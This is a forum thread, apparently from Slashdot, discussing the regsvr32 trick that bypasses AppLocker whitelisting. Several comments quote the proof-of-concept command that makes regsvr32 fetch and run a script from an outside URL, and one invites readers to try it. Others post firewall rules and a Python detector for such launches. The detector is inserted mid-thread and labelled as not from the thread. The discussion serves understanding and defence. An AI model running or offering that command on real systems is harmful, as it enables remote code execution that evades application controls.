Security Microsoft Windows

Core Windows Utility Can Be Used To Bypass Whitelisting (threatpost.com)

Reader msm1267 writes: A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft's AppLocker. A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft. It's unknown whether Microsoft will patch this issue with a security bulletin, or in a future release. Regsvr32, also known as Microsoft Register Server, is a Microsoft-signed binary that runs as default on Windows. The researcher's proof-of-concept allows him to download and run JavaScript or VBScript from a URL provided via the command line. "There's really no patch for this; it's not an exploit. It's just using the tool in an unorthodox manner. It's a bypass, an evasion tactic," the researcher said. The Register reports: "It's built-in remote code execution without admin rights and which bypasses Windows whitelisting. I'd say it's pretty bad," said Alex Ionescu, a Windows and ARM kernel guru. The trick -- Smith didn't want to call it an exploit -- is neat because it does not touch the Registry, does not need administrator rights, can be wrapped up in an encrypted HTTP session, and should leave no trace on disk as it's a pure to-memory download. No patch exists for this, although regsvr32 can be firewalled off from the internet. Microsoft was not available for immediate comment.
  • by Frosty Piss ( 770223 ) * on Friday April 22, 2016 @11:30AM (#51964721)

    A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft.

    • by Anonymous Coward

      They ignored it, so it became less private.

      • by Anonymous Coward

        No. They didn't issue a patch within 2 hours, so he went public.

  • easy.

  • Don't all browsers have url javascript shut off by default?

  • You need to run regsvr32 with admin rights anyway. If you're dumb enough to register an unsafe/unknown component you deserve to get hacked.

    • by Anonymous Coward on Friday April 22, 2016 @11:50AM (#51964879)

      The real issue is that regsvr32 understands URLs:

      regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

      Running this tells Windows to fetch an XML file from the internet, which tells it to run cmd.exe. The magic here is that if you change cmd.exe for any program outside the AppLocker whitelist, bingo: it will start, in theory. regsvr32 is part of the operating system and can be used to register and unregister COM script files with the Windows Registry. /s tells regsvr32 to be silent, /n tells it not to use DllRegisterServer, /i passes an optional parameter (our URL) to DLLinstall, /u means we're trying to unregister an object, and scrobj.dll is Microsoft's Script Component Runtime.
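As an added detection example (not from the thread or from the researcher), the following Python flags process-creation records in which regsvr32 is started with an /i: parameter that points at an http/https URL, the pattern the comment above walks through; the simplified Sysmon-style log layout and the example.invalid URLs are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation records in a simplified "Sysmon Event ID 1"
# layout: fields separated by "|", each written as "Name: value".
SAMPLE_EVENTS = [
    r'Image: C:\Windows\System32\regsvr32.exe|CommandLine: regsvr32 /s /n /u /i:http://example.invalid/file.sct scrobj.dll',
    r'Image: C:\Windows\SysWOW64\regsvr32.exe|CommandLine: regsvr32.exe /s /n /u /i:"https://example.invalid/a.sct" scrobj.dll',
    r'Image: C:\Windows\System32\regsvr32.exe|CommandLine: regsvr32 /s "C:\Program Files\Vendor\vendor.dll"',
    r'Image: C:\Windows\System32\cmd.exe|CommandLine: cmd /c dir',
]

REGSVR32_NAMES = {"regsvr32.exe", "regsvr32"}
REMOTE_SCHEMES = {"http", "https"}


def parse_event(line):
    """Split one record into a {field: value} dict."""
    fields = {}
    for part in line.split("|"):
        name, _, value = part.partition(": ")
        fields[name.strip()] = value.strip()
    return fields


def tokenize(cmdline):
    """Split a command line into arguments, keeping quoted paths together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def analyze(line):
    """Return a finding dict for a remote-scriptlet regsvr32 launch, else None."""
    ev = parse_event(line)
    image = ev.get("Image", "")
    basename = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if basename not in REGSVR32_NAMES:
        return None  # covers both System32 and SysWOW64 copies by file name
    indicators, url = [], None
    for tok in tokenize(ev.get("CommandLine", "")):
        low = tok.lower()
        if low[:3] in ("/i:", "-i:"):
            target = tok[3:].strip('"')  # handles /i:"https://..." as well
            if urlparse(target).scheme.lower() in REMOTE_SCHEMES:
                url, _ = target, indicators.append("remote /i: target")
        elif low == "scrobj.dll":
            indicators.append("scrobj.dll (Script Component Runtime) named")
        elif low in ("/n", "-n"):
            indicators.append("/n skips DllRegisterServer")
    if url is None:
        return None  # local DLL registrations are normal administrative use
    severity = "high" if any("scrobj" in i for i in indicators) else "medium"
    return {"image": image, "url": url, "indicators": indicators, "severity": severity}


def scan(lines):
    """Run analyze() over every record and keep only the findings."""
    return [f for f in (analyze(l) for l in lines) if f]
```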

    • by Charles Werbick ( 4135297 ) on Friday April 22, 2016 @12:06PM (#51964991)

      This exploit does not need admin rights. I just tried it. The request for admin rights only happens when a DLL is registered/unregistered. The flag /n prevents DLLRegisterServer from being used which defers the permission check.

      The real trick here is that regsrvr32.dll will take a URL instead of a file as a script. No one had tried that before.

      (Scared me enough I made a new firewall rule blocking outbound connections from regsrvr32.dll.)

      Anyone who wants to try the proof-of-concept just open a command prompt and enter (from the article) -

      regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

      • So basically it can seed and execute Ransomware from an HTTPS session?? Oh, NICE! NOT!!! Being that form of malware runs purely in RAM and doesn't leave a trace of code on the disk other than encrypting local and mapped data.

      • Just tried it and my firewall http://www.binisoft.org/wfc.ph... [binisoft.org] (default: deny all outgoing/incoming) gave me a nice popup asking if I want to allow it.

  • by U2xhc2hkb3QgU3Vja3M ( 4212163 ) on Friday April 22, 2016 @11:57AM (#51964925)

    The Disable Advertising checkbox does not work.

  • I would think this can bypass Bit9 as well, since regsvr32 is a common windows component and allowed. Anyone got a different opinion?
  • by Mr.Intel ( 165870 ) on Friday April 22, 2016 @12:02PM (#51964949)
    It's a PowerShell command: New-NetFirewallRule -DisplayName "Block Regsrvr32" -Program "%SystemRoot%\System32\regsvr32.exe" -Direction Outbound -Action Block
    • by davor_p ( 98394 )

      Do not forget Wow64 version of the executable in %SystemRoot%\SysWOW64 directory on 64-bit systems:

      New-NetFirewallRule -DisplayName "Block Regsvr32" -Program "%SystemRoot%\System32\regsvr32.exe" -Direction Outbound -Action Block
      New-NetFirewallRule -DisplayName "Block Regsvr32 Wow64" -Program "%SystemRoot%\SysWOW64\regsvr32.exe" -Direction Outbound -Action Block

      (do try to run this from PowerShell with admin rights as well)

  • I'd laugh

    I'd laugh, except the regular "exploit du jour" thing just isn't funny any more.

    Honestly, Windows has more holes than a Chinese whorehouse. Is it ever going to be a secure operating system?

    • by Megol ( 3135005 )

      Standard operating systems have a lot of surface to exploit. The real question is if there will ever be a secure operating system, I'm not sure given the expectations of users. Still could be a _lot_ better...

  • So basically the guy that wrote the article had not read the TechNet article that Microsoft wrote about AppLocker's restrictions.
    https://technet.microsoft.com/... [microsoft.com]

    AppLocker rules either allow or prevent an application from launching. AppLocker does not control the behavior of applications after they are launched. Applications could contain flags passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll to be loaded. In practice, an application that is allowed by AppLocke

    • Looks like you didn't read TFA.

      The exploit is that regsvr32 can download a script from the Internet and execute it. If that script launches an executable that AppLocker should block, the executable will launch anyway.

      In short, not only is a single command all that's necessary to download a malware kit from the Internet and run it, the kit can be a simple (and locally untraceable) way to get around AppLocker restrictions.

      • by clovis ( 4684 )

        I did read the article, and understand the attack.
        The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

        If users can run cmd prompts and regsvr32, then you're hosed anyway.
        If you want to prevent misuse of regsvr32, cmd prompts and tools like that, you use Group Policy.

        • The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

          Basically, what you are saying is that Applocker is designed to be ineffective.

          • by clovis ( 4684 )

            The point is that Applocker is not designed to prevent this kind of attack and that is spelled out in the documentation, hence the RTFM comment.

            Basically, what you are saying is that Applocker is designed to be ineffective.

            Lol, good one, but no.

            AppLocker does what it is supposed to do, and it does not do what it says it can't do. But you would not know that unless you read the documentation.
            AppLocker documentation specifically says it does not protect against something like regsvr32's newly discovered behavior.

            AppLocker's purpose is to simplify software restriction policies and it's useful for that.
            If you have to create the images for 1,000 workstations, and only 500 of them have licensing for Microsoft office, 150 have licens

            • Your argument appears to be that: "Applocker meets its specifications, thus its behaviour is effective".

              The problem is that its specified behaviour isn't up to the task. As far as I can tell, the provided exploit would allow the user to run any of the programs you list. So, what's its point?

              I never claimed that it was an anti-malware tool.

              • by clovis ( 4684 )

                Your argument appears to be that: "Applocker meets its specifications, thus its behaviour is effective".

                The problem is that its specified behaviour isn't up to the task. As far as I can tell, the provided exploit would allow the user to run any of the programs you list. So, what's its point?

                I never claimed that it was an anti-malware tool.

                From the documentation:

                AppLocker rules either allow or prevent an application from launching. AppLocker does not control the behavior of applications after they are launched. Applications could contain flags passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll to be loaded. In practice, an application that is allowed by AppLocker could use these flags to bypass AppLocker rules and launch child processes. You must thoroughly examine each application before allowing them to run by using AppLocker rules.

                Again:

                You must thoroughly examine each application before allowing them to run by using AppLocker rules.

                Do users need to be running regsvr32? No, they do not. You block it using AppLocker just like you block regedit.exe and sol.exe

                Also, if you go to the trouble of implementing something like AppLocker, you don't let users open cmd prompts or run bat files. No ordinary user should be able to type in anything like "regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll" and run it if you have control of the corporate systems.

                Full disclosure: we don't use AppLocker where I work, but we us

  • by nuckfuts ( 690967 ) on Friday April 22, 2016 @12:16PM (#51965079)
    I was a bit surprised to see this researcher has published complete details of how to exploit this, such as a sample XML file for launching cmd.exe. I don't see any indication that Casey Smith attempted to report this in a responsible way, or to give the vendor a chance to respond. This kind of disclosure could potentially do a lot of harm.
    • by guruevi ( 827432 )

      According to the summary, the researcher did disclose this to Microsoft and they probably didn't respond. This is really a one-day patch kind of thing. Responsible disclosure is only invented by the corporations like Microsoft so they don't have to react quickly to a bug and it's reasonable to expect that the NSA is involved as well so they have a window to exploit the bug.

      After the push to responsible disclosure by Microsoft, their products suddenly got "safer". I say disclose, God knows how many bugs Micr

    • I was a bit surprised to see this researcher has published complete details of how to exploit this, such as a sample XML file for launching cmd.exe. I don't see any indication that Casey Smith attempted to report this in a responsible way, or to give the vendor a chance to respond. This kind of disclosure could potentially do a lot of harm.

      It's a post-compromise application whitelisting bypass, of which there are other techniques. I don't think this is quite what you think it is.

  • Soooo...remove execute permission for the binary from everyone but administrators? Problem solved?
  • Can't you just rename the damn file to something else?

  • ...This is a guy that participated in the development of ReactOS. It seems he's pretty smart. A pity he abandoned the project. It really needs people like him.
  • The Register article has a bit more information. This isn't really a vulnerability. It's definitely not "remote code execution". It works like this:

    - Microsoft provides a tool called AppLocker that can be used to limit the programs that can be run on a system.
    - The AppLocker tool is not intended as a tight "security boundary". Instead, it is a way to implement company policies like "no playing games at work", or to help with software licensing, i.e. "the company system image has a copy of Photoshop, but you
